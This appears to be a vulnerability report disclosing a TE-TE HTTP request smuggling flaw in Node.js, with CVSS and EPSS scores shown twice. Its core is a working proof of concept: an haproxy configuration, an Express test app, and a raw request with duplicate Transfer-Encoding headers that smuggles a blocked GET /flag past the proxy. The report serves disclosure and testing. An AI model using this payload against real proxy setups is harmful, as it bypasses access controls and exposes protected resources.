6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.003 Low
EPSS
Percentile
64.7%
Summary:
Potential HTTP Request Smuggling exists in nodejs. Attacker can use two same header field make TE-TE HTTP Request Smuggling attack.
Description:
nodejs allow same header field in a http request. for example, we can send two Transfer-Encoding
header field, even if one of them is false header field. But nodejs only identify the first header field and ignore the after. This lead to a Potential HTTP Request Smuggling.
for example, using haproxy to make TE-TE attack:
haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag
URI
global
daemon
maxconn 256
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend http-in
bind *:80
default_backend servers
acl url_403 path_beg -i /flag
http-request deny if url_403
backend servers
server server1 127.0.0.1:8080 maxconn 32
app.js
var express = require('express');
var app = express();
var bodyParser = require('body-parser')
app.use(bodyParser())
app.get('/', function (req, res) {
res.send('Hello World!');
});
app.get('/flag', function (req, res) {
res.send('flag is 1a2b3c4d5e6f');
});
app.post('/', function (req, res) {
res.send('Hello World!');
});
app.listen(8080, function () {
console.log('Example app listening on port 8080!');
});
use this http request can bypass haproxy /flag
restrict
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
1
A
0
GET /flag HTTP/1.1
Host: 127.0.0.1
foo: x
It is possible to smuggle the request and disrupt the user experience.
N/A
It is possible to smuggle the request and disrupt the user experience.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.003 Low
EPSS
Percentile
64.7%